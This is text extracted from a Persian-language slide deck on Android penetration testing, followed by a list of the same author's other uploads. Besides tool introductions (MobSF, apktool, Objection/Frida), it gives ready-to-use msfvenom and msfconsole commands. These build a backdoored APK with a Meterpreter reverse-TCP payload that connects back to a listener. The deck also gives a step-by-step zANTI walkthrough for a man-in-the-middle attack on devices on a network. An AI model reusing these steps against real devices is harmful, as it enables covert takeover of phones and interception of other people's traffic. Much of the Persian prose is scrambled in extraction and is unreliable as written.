‫ا‬ ‫سطری‬ ‫یک‬ ‫دستور‬ ‫یا‬ ‫اینتراکتیو‬ ‫حالت‬ ‫دو‬ ‫در‬ ‫و‬ ‫شده‬ ‫سازی‬ ‫پیاده‬ ‫پایتون‬ ‫بر‬ ‫مبتنی‬ ‫ابزار‬ ‫این‬
‫شود‬ ‫می‬ ‫جرا‬
.
‫است‬ ‫آسان‬ ‫بسیار‬ ‫اینتراکتیو‬ ‫حالت‬ ‫در‬ ‫مخصوصا‬ ‫آن‬ ‫از‬ ‫استفاده‬
.
‫ابزار‬
MOBSF
• Adb shell pm list packages
• Adb shell pm path packagename
• Adb pull filepath
• Decompile with apktools
• Grep –r “line number find with jadx gui”
• Json decode encode
MOD REAL APP
• Apktool b filedir –o name test.apk
• Sign apk
• ...
MOD REAL APP
HACK ANDROID DEVICES WITH METASPLOIT
• for generate peyload:
• msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.60
lport=443R>/home/undercover/Desktop/backdoor.apk
• Msfconsole
• set payload android/meterpreter/reverse_tcp
• set lhost 192.168.43.60
• set lport 443
• exploit -j
‫ابزار‬
Objection
‫که‬
‫اختصاری‬
‫از‬
‫کلمات‬
Object Injection
،‫هست‬
‫تو‬
‫بخش‬
‫آرسنال‬
‫کنفرانس‬
‫بلک‬
‫هت‬
‫اروپا‬
‫سال‬
2017
‫در‬
‫لندن‬
‫معرفی‬
‫شد‬
.
‫این‬
‫ابزار‬
‫از‬
Frdia
‫استفاده‬
‫می‬
‫کنه‬
‫و‬
‫به‬
‫شما‬
‫کمک‬
‫می‬
‫کنه‬
‫که‬
‫تسلط‬
‫فوق‬
‫العاده‬
‫ای‬
‫روی‬
‫برنامه‬
‫ای‬
‫که‬
‫دا‬
‫رید‬
‫تست‬
‫می‬
،‫کنید‬
‫در‬
‫زمان‬
‫اجرا‬
‫داشته‬
‫باشی‬
‫د‬
.
‫یکی‬
‫از‬
‫نکات‬
‫قابل‬
‫توجه‬
‫این‬
‫ابزار‬
‫اینه‬
‫ک‬
‫ه‬
‫با‬
‫دستگاه‬
‫های‬
‫غیر‬
‫روت‬
‫یا‬
‫جیل‬
‫بریک‬
‫نشد‬
‫ه‬
‫هم‬
‫کار‬
‫می‬
‫کنه‬
.
‫معرفی‬
OBJECTION
•
‫ها‬ ‫مولفه‬
•
‫شده‬ ‫تشکیل‬ ‫مولفه‬ ‫سه‬ ‫از‬ ‫آبجکشن‬
:
•
‫بخش‬
Frida gadget
‫بصورت‬ ‫که‬
embedded
‫می‬ ‫تعبیه‬ ‫کنید‬ ‫می‬ ‫تست‬ ‫دارید‬ ‫که‬ ‫ای‬ ‫برنامه‬ ‫توی‬
‫کنید‬ ‫استفاده‬ ‫کرده‬ ‫مهیا‬ ‫براتون‬ ‫فریدا‬ ‫که‬ ‫امکاناتی‬ ‫از‬ ‫تونید‬ ‫می‬ ‫شما‬ ‫و‬ ‫شه‬
.
•
‫کالینت‬
Objection
‫بصورت‬ ‫هست‬ ‫پایتونی‬ ‫ابزار‬ ‫یه‬ ‫که‬
REPL (
‫فرمان‬ ‫خط‬
)
‫از‬ ‫رو‬ ‫دستورات‬ ‫تونه‬ ‫می‬
‫اجرا‬ ‫رو‬ ‫اونها‬ ‫میشه‬ ‫اجرا‬ ‫داره‬ ‫گوشی‬ ‫یا‬ ‫اموالتور‬ ‫توی‬ ‫که‬ ‫فریدا‬ ‫سرور‬ ‫از‬ ‫استفاده‬ ‫با‬ ‫و‬ ‫بگیره‬ ‫شما‬
‫کنه‬
.
•
‫یا‬ ‫ها‬ ‫اسکریپت‬
Hook
‫شدن‬ ‫نوشته‬ ‫فریدا‬ ‫برای‬ ‫فهم‬ ‫قابل‬ ‫زبان‬ ‫به‬ ‫که‬ ‫ها‬
(
‫معموال‬
js(
‫و‬
‫شما‬ ‫که‬ ‫کارهایی‬
‫دن‬ ‫می‬ ‫انجام‬ ‫رو‬ ‫بشه‬ ‫انجام‬ ‫دارید‬ ‫دوست‬
.
•
‫حمله‬
‫مرد‬
‫میانی‬
mitm
‫چیست‬
‫؟‬
•
‫در‬
‫حمله‬
‫مرد‬
‫میانی‬
‫هکر‬
‫میاد‬
‫و‬
‫خودش‬
‫رو‬
‫بین‬
‫دو‬
‫دستگاهی‬
‫قرار‬
‫میده‬
‫که‬
‫دارن‬
‫با‬
‫هم‬
‫دیگه‬
‫تبادل‬
‫اطالعات‬
‫میکنن‬
‫و‬
‫از‬
‫این‬
‫طریق‬
‫به‬
‫راحتی‬
‫میتونه‬
‫اطالعات‬
‫رو‬
‫شنود‬
‫کنه‬
‫و‬
‫از‬
‫طریق‬
‫ش‬
‫نود‬
‫میتونه‬
‫به‬
‫اطالعات‬
‫حساسی‬
‫دست‬
‫پیدا‬
‫کنه‬
‫بدون‬
‫اینکه‬
‫سیستم‬
‫قربانی‬
‫متوجه‬
‫بش‬
‫ه‬
.
‫فرض‬
‫کنید‬
‫میخواهید‬
‫از‬
‫سیستم‬
A
‫به‬
‫سیستم‬
B
‫یک‬
‫پیغام‬
‫ارسال‬
‫کنید‬
‫هکر‬
‫میخواد‬
‫اطالعات‬
‫بین‬
‫سیست‬
‫م‬
A
‫و‬
B
‫رو‬
‫شنود‬
‫کنه‬
‫پس‬
‫میاد‬
‫به‬
‫سیستم‬
A
‫میگه‬
‫که‬
‫من‬
‫سیستم‬
B
‫هستم‬
‫و‬
‫به‬
‫سیستم‬
B
‫میگه‬
‫که‬
‫من‬
‫سیستم‬
A
‫هستم‬
‫و‬
‫هر‬
‫دو‬
‫سیستم‬
‫اطالعاتشون‬
‫رو‬
‫میدن‬
‫به‬
‫هکر‬
‫و‬
‫تمامی‬
‫اطالعات‬
‫از‬
‫سیستم‬
‫هکر‬
‫عبور‬
‫میکنه‬
‫و‬
‫توسط‬
‫هکر‬
‫قابل‬
‫رویت‬
‫و‬
‫تغییر‬
‫است‬
.
‫مردمیانی‬ ‫حمله‬ ‫آموزش‬
MITM
‫ابزار‬ ‫توسط‬ ‫اندرویدی‬ ‫گوشی‬ ‫با‬
ZANTI
•
‫ابزار‬
Zanti
‫رو‬
‫دانلود‬
‫و‬
‫نصب‬
‫کنید‬
‫بعد‬
‫از‬
‫نصب‬
‫ثبت‬
‫نام‬
‫رو‬
‫انجام‬
‫بدید‬
‫و‬
‫بعد‬
‫از‬
‫ثبت‬
‫نام‬
‫وارد‬
‫برنامه‬
‫میشید‬
‫و‬
‫میبینید‬
‫که‬
‫لیست‬
‫دستگاهایی‬
‫که‬
‫به‬
‫شبکه‬
‫متصل‬
‫هستن‬
‫رو‬
‫نش‬
‫ون‬
‫داده‬
•
‫دستگاهی‬
‫که‬
‫میخواهید‬
‫حمله‬
‫مرد‬
‫میانی‬
mitm
‫رو‬
‫روش‬
‫انجام‬
‫بدید‬
‫رو‬
‫انتخاب‬
‫کنید‬
‫و‬
‫در‬
‫صفحه‬
‫باز‬
‫شده‬
‫گزینه‬
man in the middle
‫رو‬
‫انتخاب‬
‫کنید‬
•
‫بعد‬
‫از‬
‫انتخاب‬
‫گزینه‬
Man in the Middle
‫یک‬
‫سری‬
‫تنظیمات‬
‫براتون‬
‫میاره‬
•
‫در‬
‫قسمت‬
‫باال‬
‫برروی‬
off
‫بزنید‬
‫تا‬
‫این‬
‫بخش‬
‫فعال‬
‫بشه‬
‫براتون‬
•
‫جایگزینی‬
‫عکس‬
‫دلخواه‬
‫موقع‬
‫رفتن‬
‫تارگت‬
‫یه‬
‫یک‬
‫سایت‬
‫با‬ ‫کار‬ ‫مراحل‬
ZANTI
‫با‬ ‫کار‬ ‫مراحل‬
ZANTI

More Related Content

More from SaeidGhasemshirazi

Deep Dive to Understanding the Mirai Botnet
Deep Dive to Understanding the Mirai BotnetDeep Dive to Understanding the Mirai Botnet
Deep Dive to Understanding the Mirai Botnet
SaeidGhasemshirazi
 
All Things Considered: An Analysis of IoT Devices on Home Networks
All Things Considered: An Analysis of IoT Devices on Home NetworksAll Things Considered: An Analysis of IoT Devices on Home Networks
All Things Considered: An Analysis of IoT Devices on Home Networks
SaeidGhasemshirazi
 
Understing the mirai botnet and the impact on iot security
Understing the mirai botnet and the impact on iot securityUndersting the mirai botnet and the impact on iot security
Understing the mirai botnet and the impact on iot security
SaeidGhasemshirazi
 
All Things Considered: An Analysis of IoT Devices on Home Networks.pptx
All Things Considered: An Analysis of IoT Devices on Home Networks.pptxAll Things Considered: An Analysis of IoT Devices on Home Networks.pptx
All Things Considered: An Analysis of IoT Devices on Home Networks.pptx
SaeidGhasemshirazi
 
A Novel Aprroach for smart contract audit.pdf
A Novel Aprroach for smart contract audit.pdfA Novel Aprroach for smart contract audit.pdf
A Novel Aprroach for smart contract audit.pdf
SaeidGhasemshirazi
 
IoT-Shield: A Novel DDoS Detection Approach for IoT-Based Devices
IoT-Shield: A Novel DDoS Detection Approach for IoT-Based DevicesIoT-Shield: A Novel DDoS Detection Approach for IoT-Based Devices
IoT-Shield: A Novel DDoS Detection Approach for IoT-Based Devices
SaeidGhasemshirazi
 
تامین امنیت در قراردادهای هوشمند | Smart Contract Security
تامین امنیت در قراردادهای هوشمند | Smart Contract Securityتامین امنیت در قراردادهای هوشمند | Smart Contract Security
تامین امنیت در قراردادهای هوشمند | Smart Contract Security
SaeidGhasemshirazi
 
Virtual sports club Presentation(Startup idea)
Virtual sports club Presentation(Startup idea)Virtual sports club Presentation(Startup idea)
Virtual sports club Presentation(Startup idea)
SaeidGhasemshirazi
 
The zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامین
The zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامینThe zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامین
The zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامین
SaeidGhasemshirazi
 
Security in sdn/nfv and 5 g network
Security in sdn/nfv and 5 g networkSecurity in sdn/nfv and 5 g network
Security in sdn/nfv and 5 g network
SaeidGhasemshirazi
 
Business model canvas | بوم مدل کسب و کار
Business model canvas | بوم مدل کسب و کارBusiness model canvas | بوم مدل کسب و کار
Business model canvas | بوم مدل کسب و کار
SaeidGhasemshirazi
 
CyberlLogitec Service Dominant Business Model Radar
CyberlLogitec Service Dominant Business Model RadarCyberlLogitec Service Dominant Business Model Radar
CyberlLogitec Service Dominant Business Model Radar
SaeidGhasemshirazi
 
Clubhouse strategy | بررسی استراتژی کلاب هوس
Clubhouse strategy | بررسی استراتژی کلاب هوسClubhouse strategy | بررسی استراتژی کلاب هوس
Clubhouse strategy | بررسی استراتژی کلاب هوس
SaeidGhasemshirazi
 
اختلال و نفوذ در شبکه از طریق حفره های امنیتی
اختلال و نفوذ در شبکه از طریق حفره های امنیتیاختلال و نفوذ در شبکه از طریق حفره های امنیتی
اختلال و نفوذ در شبکه از طریق حفره های امنیتی
SaeidGhasemshirazi
 
انواع ارزیابی های امنیتی و مراحل تست و نفوذ
انواع ارزیابی های امنیتی و مراحل تست  و نفوذانواع ارزیابی های امنیتی و مراحل تست  و نفوذ
انواع ارزیابی های امنیتی و مراحل تست و نفوذ
SaeidGhasemshirazi
 
Amazon mission statement
Amazon mission statementAmazon mission statement
Amazon mission statement
SaeidGhasemshirazi
 
تحلیل و بررسی استراتژِی های شرکت گوگل و یاهو
تحلیل و بررسی استراتژِی های شرکت گوگل و یاهوتحلیل و بررسی استراتژِی های شرکت گوگل و یاهو
تحلیل و بررسی استراتژِی های شرکت گوگل و یاهو
SaeidGhasemshirazi
 
انواع مختلف شرکت ها و اطلاعات مربوط به آنها
انواع مختلف شرکت ها و اطلاعات مربوط به آنهاانواع مختلف شرکت ها و اطلاعات مربوط به آنها
انواع مختلف شرکت ها و اطلاعات مربوط به آنها
SaeidGhasemshirazi
 
خلاصه فصل سوم کتاب تست مامان
خلاصه فصل سوم کتاب تست مامانخلاصه فصل سوم کتاب تست مامان
خلاصه فصل سوم کتاب تست مامان
SaeidGhasemshirazi
 
Process mining error detection for security iot
Process mining error detection for security iotProcess mining error detection for security iot
Process mining error detection for security iot
SaeidGhasemshirazi
 

More from SaeidGhasemshirazi (20)

Deep Dive to Understanding the Mirai Botnet
Deep Dive to Understanding the Mirai BotnetDeep Dive to Understanding the Mirai Botnet
Deep Dive to Understanding the Mirai Botnet
 
All Things Considered: An Analysis of IoT Devices on Home Networks
All Things Considered: An Analysis of IoT Devices on Home NetworksAll Things Considered: An Analysis of IoT Devices on Home Networks
All Things Considered: An Analysis of IoT Devices on Home Networks
 
Understing the mirai botnet and the impact on iot security
Understing the mirai botnet and the impact on iot securityUndersting the mirai botnet and the impact on iot security
Understing the mirai botnet and the impact on iot security
 
All Things Considered: An Analysis of IoT Devices on Home Networks.pptx
All Things Considered: An Analysis of IoT Devices on Home Networks.pptxAll Things Considered: An Analysis of IoT Devices on Home Networks.pptx
All Things Considered: An Analysis of IoT Devices on Home Networks.pptx
 
A Novel Aprroach for smart contract audit.pdf
A Novel Aprroach for smart contract audit.pdfA Novel Aprroach for smart contract audit.pdf
A Novel Aprroach for smart contract audit.pdf
 
IoT-Shield: A Novel DDoS Detection Approach for IoT-Based Devices
IoT-Shield: A Novel DDoS Detection Approach for IoT-Based DevicesIoT-Shield: A Novel DDoS Detection Approach for IoT-Based Devices
IoT-Shield: A Novel DDoS Detection Approach for IoT-Based Devices
 
تامین امنیت در قراردادهای هوشمند | Smart Contract Security
تامین امنیت در قراردادهای هوشمند | Smart Contract Securityتامین امنیت در قراردادهای هوشمند | Smart Contract Security
تامین امنیت در قراردادهای هوشمند | Smart Contract Security
 
Virtual sports club Presentation(Startup idea)
Virtual sports club Presentation(Startup idea)Virtual sports club Presentation(Startup idea)
Virtual sports club Presentation(Startup idea)
 
The zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامین
The zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامینThe zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامین
The zero trust supply chain | پارادایم اعتماد صفر در زنجیره تامین
 
Security in sdn/nfv and 5 g network
Security in sdn/nfv and 5 g networkSecurity in sdn/nfv and 5 g network
Security in sdn/nfv and 5 g network
 
Business model canvas | بوم مدل کسب و کار
Business model canvas | بوم مدل کسب و کارBusiness model canvas | بوم مدل کسب و کار
Business model canvas | بوم مدل کسب و کار
 
CyberlLogitec Service Dominant Business Model Radar
CyberlLogitec Service Dominant Business Model RadarCyberlLogitec Service Dominant Business Model Radar
CyberlLogitec Service Dominant Business Model Radar
 
Clubhouse strategy | بررسی استراتژی کلاب هوس
Clubhouse strategy | بررسی استراتژی کلاب هوسClubhouse strategy | بررسی استراتژی کلاب هوس
Clubhouse strategy | بررسی استراتژی کلاب هوس
 
اختلال و نفوذ در شبکه از طریق حفره های امنیتی
اختلال و نفوذ در شبکه از طریق حفره های امنیتیاختلال و نفوذ در شبکه از طریق حفره های امنیتی
اختلال و نفوذ در شبکه از طریق حفره های امنیتی
 
انواع ارزیابی های امنیتی و مراحل تست و نفوذ
انواع ارزیابی های امنیتی و مراحل تست  و نفوذانواع ارزیابی های امنیتی و مراحل تست  و نفوذ
انواع ارزیابی های امنیتی و مراحل تست و نفوذ
 
Amazon mission statement
Amazon mission statementAmazon mission statement
Amazon mission statement
 
تحلیل و بررسی استراتژِی های شرکت گوگل و یاهو
تحلیل و بررسی استراتژِی های شرکت گوگل و یاهوتحلیل و بررسی استراتژِی های شرکت گوگل و یاهو
تحلیل و بررسی استراتژِی های شرکت گوگل و یاهو
 
انواع مختلف شرکت ها و اطلاعات مربوط به آنها
انواع مختلف شرکت ها و اطلاعات مربوط به آنهاانواع مختلف شرکت ها و اطلاعات مربوط به آنها
انواع مختلف شرکت ها و اطلاعات مربوط به آنها
 
خلاصه فصل سوم کتاب تست مامان
خلاصه فصل سوم کتاب تست مامانخلاصه فصل سوم کتاب تست مامان
خلاصه فصل سوم کتاب تست مامان
 
Process mining error detection for security iot
Process mining error detection for security iotProcess mining error detection for security iot
Process mining error detection for security iot
 

Android Penetration Testing(Android Security)